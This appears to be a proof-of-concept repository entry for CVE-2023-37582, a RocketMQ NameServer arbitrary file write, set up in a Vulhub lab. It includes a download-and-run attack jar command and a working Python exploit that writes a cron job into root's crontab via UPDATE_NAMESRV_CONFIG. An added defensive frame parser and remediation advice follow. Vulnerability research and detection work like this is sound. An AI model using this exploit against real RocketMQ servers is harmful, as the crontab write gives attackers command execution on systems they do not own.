Awesome-POC/中间件漏洞/Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582.md
2025-02-10 14:01:45 +08:00

# Apache RocketMQ NameServer Arbitrary File Write Vulnerability CVE-2023-37582
## Vulnerability Description
Apache RocketMQ is a distributed messaging and stream-processing platform featuring low latency, high performance and reliability, trillion-level capacity, and flexible scalability.
In RocketMQ 5.1.1 and earlier, the NameServer component contains an arbitrary file write vulnerability. The flaw is in the NameServer's configuration update feature: by sending an `UPDATE_NAMESRV_CONFIG` command to the NameServer, an attacker can change the `configStorePath` configuration item together with the stored contents, which results in an arbitrary file write.
The vulnerability stems from an incomplete fix for [CVE-2023-33246](https://github.com/vulhub/vulhub/tree/master/rocketmq/CVE-2023-33246). When addressing CVE-2023-33246, the upstream team introduced a blacklist of configuration items that must not be modified. However, the patch mistakenly put `configStorePathName` on that blacklist instead of `configStorePath`, leaving the real key unprotected.
References:
- https://github.com/apache/rocketmq/pull/6843
- https://drun1baby.top/2023/11/21/CVE-2023-37582-Apache-RocketMQ-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
- https://github.com/Malayke/CVE-2023-37582_EXPLOIT
## Affected Versions
```
RocketMQ < 4.9.7
RocketMQ < 5.1.2
```
## Network Mapping
```
title="RocketMQ"
```
## Environment Setup
Run the following command in Vulhub to start a RocketMQ NameServer 5.1.0:
```shell
docker compose up -d
```
Once the environment is up, the RocketMQ NameServer listens on port 9876.
## Reproduction
Use the Vulhub project [rocketmq-attack](https://github.com/vulhub/rocketmq-attack) to reproduce the vulnerability and write an arbitrary file:
```shell
wget https://github.com/vulhub/rocketmq-attack/releases/download/1.1/rocketmq-attack-1.1-SNAPSHOT.jar
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target your-ip:9876 --file "/tmp/awesome_poc" --data "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
```
After it completes, verify that the file was written:
```shell
cat /tmp/awesome_poc
```
![](images/Apache%20RocketMQ%20NameServer%20任意文件写入漏洞%20CVE-2023-37582/image-20250210115056589.png)
Cron job variant (the same request, with the config written into root's crontab):
```python
import socket
import binascii

# Target NameServer address (placeholders; the original script left these undefined)
target_ip = "your-ip"
target_port = 9876

client = socket.socket()
client.connect((target_ip, target_port))

# Remoting header: code 318 = UPDATE_NAMESRV_CONFIG, JSON-serialized
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":435}'.encode('utf-8')
# Body: key=value properties; configStorePath is redirected to root's crontab
body='configStorePath=/var/spool/cron/crontabs/root\nbrokerConfigPath=/var/spool/cron/crontabs/root\nbindAddress=0.0.0.0\\n*/1 * * * * touch /tmp/success'.encode('utf-8')
# Header length field (4 bytes, big-endian, zero-padded; top byte 0 = JSON serialization)
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)
head1 = '00000000'+str(hex(json_lens))[2:]
print(head1)
# Total length field = 4 (header-length field) + header + body
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
print(head2)
# Frame layout: total length | header length | JSON header | body
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
# Send the frame and print the NameServer's response
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)
client.close()
```
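The following is an added example and is not code from the original page, from Vulhub, or from the RocketMQ project. It covers the two technical passages above from the defensive side: it decodes the remoting frame layout the PoC builds (4-byte total length, 4-byte header length with the serialization type in the top byte, JSON header, raw body) and flags `UPDATE_NAMESRV_CONFIG` requests (code 318) whose body sets `configStorePath`, so captured NameServer traffic can be checked for the pattern this advisory describes. The request code and the key names come from the page; flagging `configStorePathName` as well, the sample frames and the file path inside them are constructed assumptions.

```python
"""Inspect RocketMQ NameServer frames for config updates that move configStorePath.

Added example (not part of the original PoC page). Frame layout as used by the
PoC above: 4-byte big-endian total length, 4-byte header length word (top byte
is the serialization type, 0 = JSON), the JSON header, then the raw body.
"""
import json
import struct
from typing import Dict, List, Tuple

UPDATE_NAMESRV_CONFIG = 318  # request code from the PoC header
# Keys that redirect where the NameServer persists its config file.
# configStorePath is the real key; configStorePathName is the one the
# incomplete patch blacklisted (assumption: flag both when seen).
SENSITIVE_KEYS = {"configStorePath", "configStorePathName"}


def build_frame(header: dict, body: bytes) -> bytes:
    """Encode one remoting frame with JSON header serialization."""
    header_bytes = json.dumps(header, separators=(",", ":")).encode("utf-8")
    total_len = 4 + len(header_bytes) + len(body)
    return struct.pack(">II", total_len, len(header_bytes)) + header_bytes + body


def parse_frame(frame: bytes) -> Tuple[dict, bytes]:
    """Decode one frame into (header, body); raise ValueError if malformed."""
    if len(frame) < 8:
        raise ValueError("frame shorter than the two length fields")
    total_len, header_word = struct.unpack(">II", frame[:8])
    serialize_type = header_word >> 24
    header_len = header_word & 0x00FFFFFF
    if serialize_type != 0:
        raise ValueError("only JSON header serialization is handled here")
    if len(frame) != 4 + total_len:
        raise ValueError("total length field does not match frame size")
    header_end = 8 + header_len
    if header_end > len(frame):
        raise ValueError("header length exceeds frame")
    header = json.loads(frame[8:header_end].decode("utf-8"))
    return header, frame[header_end:]


def parse_properties(body: bytes) -> Dict[str, str]:
    """Parse the key=value lines the NameServer expects in the request body."""
    props: Dict[str, str] = {}
    for line in body.decode("utf-8", errors="replace").splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def inspect_frame(frame: bytes) -> List[str]:
    """Return findings for a captured request; empty list if it is not a config update."""
    header, body = parse_frame(frame)
    if header.get("code") != UPDATE_NAMESRV_CONFIG:
        return []
    props = parse_properties(body)
    findings = [f"UPDATE_NAMESRV_CONFIG sets {key}={props[key]}"
                for key in sorted(SENSITIVE_KEYS.intersection(props))]
    if not findings:
        # Any remote config update is still worth a look on an unauthenticated NameServer.
        findings.append("UPDATE_NAMESRV_CONFIG request (review changed keys: "
                        + ", ".join(sorted(props)) + ")")
    return findings


# Constructed sample frames (not captured traffic): a plain config update and
# one that redirects the store path to a constructed example file.
_HEADER = {"code": UPDATE_NAMESRV_CONFIG, "extFields": {}, "flag": 0, "language": "JAVA",
           "opaque": 1, "serializeTypeCurrentRPC": "JSON", "version": 435}
BENIGN_FRAME = build_frame(_HEADER, b"bindAddress=0.0.0.0\n")
SUSPICIOUS_FRAME = build_frame(
    _HEADER, b"configStorePath=/tmp/rocketmq-example.properties\nbindAddress=0.0.0.0\n")

if __name__ == "__main__":
    for name, frame in (("benign", BENIGN_FRAME), ("suspicious", SUSPICIOUS_FRAME)):
        print(name, inspect_frame(frame))
```

The parser refuses frames whose total-length field disagrees with the captured size, so a truncated capture surfaces as an error instead of a silent miss; in a real deployment the same check would be fed from a packet capture or proxy in front of port 9876, and any hit on `configStorePath` from a source other than an administrator host is a strong signal of this exploit.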
## Remediation
Fixed releases are available; affected users should upgrade to:
- RocketMQ 5.x >= 5.1.2
- RocketMQ 4.x >= 4.9.7
Official downloads: https://rocketmq.apache.org/download/ . It is also recommended to deploy the NameServer, Broker and other components on an internal network only and to enable authentication and authorization on them.